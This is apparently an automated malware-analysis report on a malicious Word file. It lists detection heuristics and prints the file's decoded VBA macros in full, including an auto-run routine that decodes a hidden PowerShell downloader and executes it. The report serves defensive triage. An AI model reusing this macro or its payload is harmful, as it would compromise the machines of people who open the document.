MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File: User Execution
T1071.001 Web Protocols
The sample contains VBA macros with critical firings for WScript.Shell usage and Shell() calls, indicating an attempt to execute arbitrary code. The presence of an AutoOpen macro suggests automatic execution upon document opening. The script likely uses WScript.Shell to download and execute a secondary payload, as indicated by the 'macros.bas' file and the general nature of these VBA firings.
Heuristics 12
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim WSS Set WSS = CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim WSS Set WSS = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() Auto_Open -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Const cl2Exp16 = 65536 '2 to the 16th Private Sub Document_Open() If ActiveDocument.Variables("yIbYzG").Value <> "toto" Then -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub AutoOpen() Auto_Open End Sub -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12525 bytes |
SHA-256: ca1827b1a4b2816df3d4c732f7e657ea2cb3e56c7aa4aa15fd056a8c18a62e9e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 10 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Const clOneMask = 16515072 '000000 111111 111111 111111
Private Const clTwoMask = 258048 '111111 000000 111111 111111
Private Const clThreeMask = 4032 '111111 111111 000000 111111
Private Const clFourMask = 63 '111111 111111 111111 000000
Private Const clHighMask = 16711680 '11111111 00000000 00000000
Private Const clMidMask = 65280 '00000000 11111111 00000000
Private Const clLowMask = 255 '00000000 00000000 11111111
Private Const cl2Exp18 = 262144 '2 to the 18th power
Private Const cl2Exp12 = 4096 '2 to the 12th
Private Const cl2Exp6 = 64 '2 to the 6th
Private Const cl2Exp8 = 256 '2 to the 8th
Private Const cl2Exp16 = 65536 '2 to the 16th
Private Sub Document_Open()
If ActiveDocument.Variables("yIbYzG").Value <> "toto" Then
zkDDJySBknmvYBS
ActiveDocument.Variables("yIbYzG").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
Public Function Decode64(sString As String) As String
Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
Dim lTemp As Long
sString = Replace(sString, vbCr, vbNullString) 'Get rid of the vbCrLfs. These could be in...
sString = Replace(sString, vbLf, vbNullString) 'either order.
lTemp = Len(sString) Mod 4 'Test for valid input.
If lTemp Then
Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
End If
If InStrRev(sString, "==") Then 'InStrRev is faster when you know it's at the end.
iPad = 2 'Note: These translate to 0, so you can leave them...
ElseIf InStrRev(sString, "=") Then 'in the string and just resize the output.
iPad = 1
End If
For lTemp = 0 To 255 'Fill the translation table.
Select Case lTemp
Case 65 To 90
bTrans(lTemp) = lTemp - 65 'A - Z
Case 97 To 122
bTrans(lTemp) = lTemp - 71 'a - z
Case 48 To 57
bTrans(lTemp) = lTemp + 4 '1 - 0
Case 43
bTrans(lTemp) = 62 'Chr(43) = "+"
Case 47
bTrans(lTemp) = 63 'Chr(47) = "/"
End Select
Next lTemp
For lTemp = 0 To 63 'Fill the 2^6, 2^12, and 2^18 lookup tables.
lPowers6(lTemp) = lTemp * cl2Exp6
lPowers12(lTemp) = lTemp * cl2Exp12
lPowers18(lTemp) = lTemp * cl2Exp18
Next lTemp
bIn = StrConv(sString, vbFromUnicode) 'Load the input byte array.
ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1) 'Prepare the output buffer.
For lChar = 0 To UBound(bIn) Step 4
lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3)) 'Rebuild the bits.
lTemp = lQuad And clHighMask 'Mask for the first byte
bOut(lPos) = lTemp \ cl2Exp16 'Shift it down
lTemp = lQuad And clMidMask 'Mask for the second byte
bOut(lPos + 1) = lTemp \ cl2Exp8 'Shift it down
bOut(lPos + 2) = lQuad And clLowMask 'Mask for the third byte
lPos = lPos + 3
Next lChar
sOut = StrConv(bOut, vbUnicode) 'Convert back to a string.
If iPad Then sOut = Left$(sOut, Len(sOut) - iPad) 'Chop off any extra bytes.
Decode64 = sOut
End Function
Sub AutoOpen()
Auto_Open
End Sub
Sub Auto_Open()
Dim test As String
test = ""
test = "cG93ZXJzaGVsbCAtbm9QIC1zdGEgLXcgMSAtZW5jICBTUUJHQUNnQUpBQlFBRk1BVmdCbEFISUFVd0JwQUU4QVRnQlVBRUVBUWdCc0FHVUFMZ0JRQUZNQVZnQmxBSElBVXdCcEFHOEFUZ0F1QUUwQVFRQktBRzhBY2dBZ0FDMEFSd0JGQUNBQU13QXBBSHNBSkFCSEFGQUFSZ0E5QUZzQVVnQkZBRVlBWFFBdUFFRUFVd0JUQUVVQVRRQmlBRXdBV1FBdUFFY0FaUUIwQUZRQWVRQndBR1VBS0FBbkFGTUFlUUJ6QUhRQVpRQnRBQzRBVFFCaEFHNEFZUUJuQUdVQWJRQmxBRzRBZEFBdUFFRUFkUUIwQUc4QWJRQmhBSFFBYVFCdkFHNEFMZ0JWQUhRQWFRQnNBSE1BSndBcEFDNEFJZ0JIQUdVQVZBQkdBRWtBUlFCZ0FHd0FaQUFpQUNnQUp3QmpBR0VBWXdCb0FHVUFaQUJIQUhJQWJ3QjFBSEFBVUFCdkFHd0FhUUJqQUhrQVV3QmxBSFFBZEFCcEFHNEFad0J6QUNjQUxBQW5BRTRBSndBckFDY0Fid0J1QUZBQWRRQmlBR3dBYVFCakFDd0FVd0IwQUdFQWRBQnBBR01"
test = test + "BSndBcEFEc0FTUUJHQUNnQUpBQkhBRkFBUmdBcEFIc0FKQUJIQUZBQVF3QTlBQ1FBUndCUUFFWUFMZ0JIQUVVQVZBQldBR0VBVEFCMUFHVUFLQUFrQUc0QVZRQnNBR3dBS1FBN0FFa0FSZ0FvQUNRQVJ3QlFBRU1BV3dBbkFGTUFZd0J5QUdrQWNBQjBBRUlBSndBckFDY0FiQUJ2QUdNQWF3Qk1BRzhBWndCbkFHa0FiZ0JuQUNjQVhRQXBBSHNBSkFCSEFGQUFRd0JiQUNjQVV3QmpBSElBYVFCd0FIUUFRZ0FuQUNzQUp3QnNBRzhBWXdCckFFd0Fid0JuQUdjQWFRQnVBR2NBSndCZEFGc0FKd0JGQUc0QVlRQmlBR3dBWlFCVEFHTUFjZ0JwQUhBQWRBQkNBQ2NBS3dBbkFHd0Fid0JqQUdzQVRBQnZBR2NBWndCcEFHNEFad0FuQUYwQVBRQXdBRHNBSkFCSEFGQUFRd0JiQUNjQVV3QmpBSElBYVFCd0FIUUFRZ0FuQUNzQUp3QnNBRzhBWXdCckFFd0Fid0JuQUdjQWFRQnVBR2NBSndCZEFGc0FKd0JGQUc0QVlRQmlBR3dBWlFCVEFHTUFjZ0JwQUhBQWRBQkNBR3"
test = test + "dBYndCakFHc0FTUUJ1QUhZQWJ3QmpBR0VBZEFCcEFHOEFiZ0JNQUc4QVp3Qm5BR2tBYmdCbkFDY0FYUUE5QURBQWZRQWtBRllBUVFCc0FEMEFXd0JEQUc4QVRBQk1BR1VBUXdCMEFFa0FUd0J1QUhNQUxnQkhBRVVBYmdCRkFGSUFTUUJqQUM0QVJBQkpBR01BVkFCSkFFOEFiZ0JoQUhJQVdRQmJBSE1BVkFCU0FHa0FiZ0JuQUN3QVV3QlpBSE1BVkFCRkFFMEFMZ0JQQUdJQVNnQmxBR01BZEFCZEFGMEFPZ0E2QUc0QVpRQjNBQ2dBS1FBN0FDUUFkZ0JCQUd3QUxnQkJBR1FBWkFBb0FDY0FSUUJ1QUdFQVlnQnNBR1VBVXdCakFISUFhUUJ3QUhRQVFnQW5BQ3NBSndCc0FHOEFZd0JyQUV3QWJ3Qm5BR2NBYVFCdUFHY0FKd0FzQURBQUtRQTdBQ1FBZGdCQkFHd0FMZ0JCQUdRQVpBQW9BQ2NBUlFCdUFHRUFZZ0JzQUdVQVV3QmpBSElBYVFCd0FIUUFRZ0JzQUc4QVl3QnJBRWtBYmdCMkFHOEFZd0JoQUhRQWFRQnZBRzRBVEFCdkFHY0Fad0JwQUc0QVp3QW5BQ"
test = test + "3dBTUFBcEFEc0FKQUJIQUZBQVF3QmJBQ2NBU0FCTEFFVUFXUUJmQUV3QVR3QkRBRUVBVEFCZkFFMEFRUUJEQUVnQVNRQk9BRVVBWEFCVEFHOEFaZ0IwQUhjQVlRQnlBR1VBWEFCUUFHOEFiQUJwQUdNQWFRQmxBSE1BWEFCTkFHa0FZd0J5QUc4QWN3QnZBR1lBZEFCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCUUFHOEFkd0JsQUhJQVV3Qm9BR1VBYkFCc0FGd0FVd0JqQUhJQWFRQndBSFFBUWdBbkFDc0FKd0JzQUc4QVl3QnJBRXdBYndCbkFHY0FhUUJ1QUdjQUp3QmRBRDBBSkFCV0FFRUFiQUI5QUVVQVRBQlRBR1VBZXdCYkFGTUFRd0JTQUVrQVVBQlVBRUlBVEFCUEFFTUFTd0JkQUM0QUlnQkhBR1VBZEFCR0FHa0FaUUJnQUd3QVJBQWlBQ2dBSndCekFHa0Fad0J1QUdFQWRBQjFBSElBWlFCekFDY0FMQUFuQUU0QUp3QXJBQ2NBYndCdUFGQUFkUUJpQUd3QWFRQmpBQ3dBVXdCMEFHRUFkQUJwQUdNQUp3QXBBQzRBVXdCbEFGUUFWZ0JoQUd3QWRRQkZB"
test = test + "Q2dBSkFCT0FGVUFiQUJNQUN3QUtBQk9BRVVBZHdBdEFFOEFRZ0JLQUVVQVl3QjBBQ0FBUXdCUEFHd0FiQUJsQUdNQVZBQnBBRzhBYmdCVEFDNEFSd0JsQUU0QVJRQnlBR2tBWXdBdUFFZ0FZUUJUQUVnQVV3QmxBRlFBV3dCVEFGUUFVZ0JKQUU0QVp3QmRBQ2tBS1FCOUFGc0FVZ0JsQUdZQVhRQXVBRUVBY3dCVEFFVUFUUUJDQUd3QWVRQXVBRWNBWlFCVUFGUUFXUUJRQUVVQUtBQW5BRk1BZVFCekFIUUFaUUJ0QUM0QVRRQmhBRzRBWVFCbkFHVUFiUUJsQUc0QWRBQXVBRUVBZFFCMEFHOEFiUUJoQUhRQWFRQnZBRzRBTGdCQkFHMEFjd0JwQUZVQWRBQnBBR3dBY3dBbkFDa0FmQUEvQUhzQUpBQmZBSDBBZkFBbEFIc0FKQUJmQUM0QVJ3QkZBRlFBUmdCcEFHVUFiQUJFQUNnQUp3QmhBRzBBY3dCcEFFa0FiZ0JwQUhRQVJnQmhBR2tBYkFCbEFHUUFKd0FzQUNjQVRnQnZBRzRBVUFCMUFHSUFiQUJwQUdNQUxBQlRBSFFBWVFCMEFHa0FZd0FuQUNrQUxnQlRBRVVBZEFCV0FFRUFiQUIxQUdVQUtBQWtBRzRBVlFCc0FFd0FMQUFrQUZRQVVnQlZBR1VBS1FCOUFEc0FmUUE3QUZzQVV3QjVBRk1BVkFCbEFFMEFMZ0JPQUVVQVZBQXVBRk1BUlFCeUFGWUFTUUJEQUVVQVVBQlBB"
test = test + "RWtBYmdCVUFFMEFRUUJPQUVFQVp3QmxBSElBWFFBNkFEb0FSUUI0QUZBQVpRQkRBRlFBTVFBd0FEQUFRd0JQQUc0QWRBQkpBRzRBVlFCRkFEMEFNQUE3QUNRQVZ3QkRBRDBBVGdCbEFGY0FMUUJQQUdJQVNnQkZBRU1BZEFBZ0FGTUFXUUJ6QUZRQVJRQnRBQzRBVGdCRkFIUUFMZ0JYQUVVQVFnQkRBRXdBYVFCbEFHNEFWQUE3QUNRQWRRQTlBQ2NBVFFCdkFIb0FhUUJzQUd3QVlRQXZBRFVBTGdBd0FDQUFLQUJYQUdrQWJnQmtBRzhBZHdCekFDQUFUZ0JVQUNBQU5nQXVBREVBT3dBZ0FGY0FUd0JYQURZQU5BQTdBQ0FBVkFCeUFHa0FaQUJsQUc0QWRBQXZBRGNBTGdBd0FEc0FJQUJ5QUhZQU9nQXhBREVBTGdBd0FDa0FJQUJzQUdrQWF3QmxBQ0FBUndCbEFHTUFhd0J2QUNjQU93QWtBRmNBWXdBdUFFZ0FaUUJoQUdRQVpRQnlBRk1BTGdCQkFHUUFaQUFvQUNjQVZRQnpBR1VBY2dBdEFFRUFad0JsQUc0QWRBQW5BQ3dBSkFCMUFDa0FPd0FrQUZjQVF3QXV"
test = test + "BRkFBVWdCdkFGZ0FXUUE5QUZzQVV3QjVBRk1BZEFCbEFHMEFMZ0JPQUVVQWRBQXVBRmNBUlFCQ0FGSUFaUUJSQUhVQVJRQnpBSFFBWFFBNkFEb0FSQUJsQUdZQVFRQlZBR3dBZEFCWEFFVUFZZ0JRQUhJQWJ3QjRBSGtBT3dBa0FIY0FZd0F1QUZBQVVnQlBBSGdBV1FBdUFFTUFjZ0JsQUdRQVJRQnVBSFFBU1FCaEFFd0FVd0FnQUQwQUlBQmJBRk1BZVFCVEFGUUFaUUJ0QUM0QVRnQmxBRlFBTGdCREFISUFSUUJFQUdVQWJnQjBBRWtBUVFCTUFFTUFZUUJqQUVnQVJRQmRBRG9BT2dCRUFHVUFaZ0JCQUZVQVRBQjBBRTRBUlFCVUFIY0FUd0JTQUdzQVF3QnlBR1VBWkFCRkFFNEFWQUJKQUdFQWJBQnpBRHNBSkFCVEFHTUFjZ0JwQUhBQWRBQTZBRkFBY2dCdkFIZ0FlUUFnQUQwQUlBQWtBSGNBWXdBdUFGQUFjZ0J2QUhnQWVRQTdBQ1FBU3dBOUFGc0FVd0JaQUhNQVZBQkZBRTBBTGdCVUFFVUFXQUIwQUM0QVJRQk9BRU1BYndCa0FFa0FUZ0JuQUYwQU9nQT"
test = test + "ZBRUVBVXdCREFFa0FTUUF1QUVjQVpRQjBBRUlBZVFCVUFHVUFjd0FvQUNjQVp3QTlBQ29BUlFCa0FDZ0FiZ0J4QUhzQUlRQm1BRnNBZmdCQkFDMEFhUUJTQURBQWJBQXBBRXNBZlFCUEFGb0FOUUEzQUhvQU9nQXJBRVFBYlFCMEFDY0FLUUE3QUNRQVVnQTlBSHNBSkFCRUFDd0FKQUJMQUQwQUpBQkJBSElBWndCVEFEc0FKQUJUQUQwQU1BQXVBQzRBTWdBMUFEVUFPd0F3QUM0QUxnQXlBRFVBTlFCOEFDVUFld0FrQUVvQVBRQW9BQ1FBU2dBckFDUUFVd0JiQUNRQVh3QmRBQ3NBSkFCTEFGc0FKQUJmQUNVQUpBQkxBQzRBUXdCdkFIVUFiZ0JVQUYwQUtRQWxBRElBTlFBMkFEc0FKQUJUQUZzQUpBQmZBRjBBTEFBa0FGTUFXd0FrQUVvQVhRQTlBQ1FBVXdCYkFDUUFTZ0JkQUN3QUpBQlRBRnNBSkFCZkFGMEFmUUE3QUNRQVJBQjhBQ1VBZXdBa0FFa0FQUUFvQUNRQVNRQXJBREVBS1FBbEFESUFOUUEyQURzQUpBQklBRDBBS0FBa0FFZ0FLd0FrQUZNQVd3Q"
test = test + "WtBRWtBWFFBcEFDVUFNZ0ExQURZQU93QWtBRk1BV3dBa0FFa0FYUUFzQUNRQVV3QmJBQ1FBU0FCZEFEMEFKQUJUQUZzQUpBQklBRjBBTEFBa0FGTUFXd0FrQUVrQVhRQTdBQ1FBWHdBdEFHSUFlQUJQQUZJQUpBQlRBRnNBS0FBa0FGTUFXd0FrQUVrQVhRQXJBQ1FBVXdCYkFDUUFTQUJkQUNrQUpRQXlBRFVBTmdCZEFIMEFmUUE3QUNRQWN3QmxBSElBUFFBbkFHZ0FkQUIwQUhBQU9nQXZBQzhBY3dCckFIa0FMUUJ1QUdVQWRBQXVBR01BWmdBNkFEZ0FNQUFuQURzQUpBQjBBRDBBSndBdkFHRUFaQUJ0QUdrQWJnQXZBR2NBWlFCMEFDNEFjQUJvQUhBQUp3QTdBQ1FBVndCREFDNEFTQUJsQUdFQVJBQmxBSElBY3dBdUFFRUFaQUJFQUNnQUlnQkRBRzhBYndCckFHa0FaUUFpQUN3QUlnQnpBR1VBY3dCekFHa0Fid0J1QUQwQVJRQkxBRVlBZEFCakFFc0FOd0JUQUhVQU9BQlZBR2dBY3dCUkFHMEFUUUJFQUVvQVdBQkJBSG9BVXdCU0FHc0FVZ0JaQUUwQVBR"
test = test + "QWlBQ2tBT3dBa0FFUUFZUUIwQUdFQVBRQWtBRmNBUXdBdUFFUUFUd0IzQUU0QWJBQlBBRUVBUkFCRUFFRUFWQUJCQUNnQUpBQnpBR1VBY2dBckFDUUFWQUFwQURzQUpBQnBBRllBUFFBa0FHUUFZUUIwQUVFQVd3QXdBQzRBTGdBekFGMEFPd0FrQUVRQVlRQlVBRUVBUFFBa0FFUUFRUUIwQUVFQVd3QTBBQzRBTGdBa0FHUUFZUUJVQUVFQUxnQnNBRVVBYmdCbkFGUUFTQUJkQURzQUxRQktBRzhBU1FCT0FGc0FRd0JvQUdFQWNnQmJBRjBBWFFBb0FDWUFJQUFrQUZJQUlBQWtBR1FBUVFCVUFFRUFJQUFvQUNRQVNRQldBQ3NBSkFCTEFDa0FLUUI4QUVrQVJRQllBQT09"
Dim Decoded
Decoded = Decode64(test)
Dim WSS
Set WSS = CreateObject("WScript.Shell")
WSS.Run Decoded, 0, False
End Sub
Attribute VB_Name = "jDiDaux"
Private Function yfLMZPvetG(gJfkRsAHXt As Variant, WoVAxvBoAg As Integer)
Dim cWwJqpVFpF, IZUNjmqjPJ As String, FuVOuWuwLk, CRKblrwnXe
IZUNjmqjPJ = ActiveDocument.Variables("yIbYzG").Value()
cWwJqpVFpF = ""
FuVOuWuwLk = 1
While FuVOuWuwLk < UBound(gJfkRsAHXt) + 2
CRKblrwnXe = FuVOuWuwLk Mod Len(IZUNjmqjPJ): If CRKblrwnXe = 0 Then CRKblrwnXe = Len(IZUNjmqjPJ)
cWwJqpVFpF = cWwJqpVFpF + Chr(Asc(Mid(IZUNjmqjPJ, CRKblrwnXe + WoVAxvBoAg, 1)) Xor CInt(gJfkRsAHXt(FuVOuWuwLk - 1)))
FuVOuWuwLk = FuVOuWuwLk + 1
Wend
yfLMZPvetG = cWwJqpVFpF
End Function
Function tVMpPFFRGuZbPMF(ByVal GLwahSmteL As String) As Boolean
FileExists = (Dir(GLwahSmteL) <> "")
End Function
Public Function zkDDJySBknmvYBS()
moITEkWZ = yfLMZPvetG(Array(49, 23, 9, 43, 7, 50, 95, 124, 69, 6), 40)
uOMURJjjvWpbvvm = yfLMZPvetG(Array(38, 12, 33, 35, 39, 104, 14, 123, 29, 15, 0, 102, 79, 40, 44, 89, 48, 36, 56, 9, 6, _
71, 19, 24, 54, 38, 67, 50, 46, 59, 84, 41, 106, 25, 2, 56, 42, 27, 25), 0)
pMpZg = "ExcludedString"
MsgBox uOMURJjjvWpbvvm
TaeEqtQwxWEW = yfLMZPvetG(Array(57, 25, 23, 53, 109, 26, 85, 21, 64, 65, 108, 14, 60, 42, 28, 70, 40, 5, 55), 61)
Cwtn = yfLMZPvetG(Array(42, 2, 105, 57, 28, 58, 56, 34, 0, 25, 45), 50)
MsgBox TaeEqtQwxWEW
MsgBox Cwtn
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.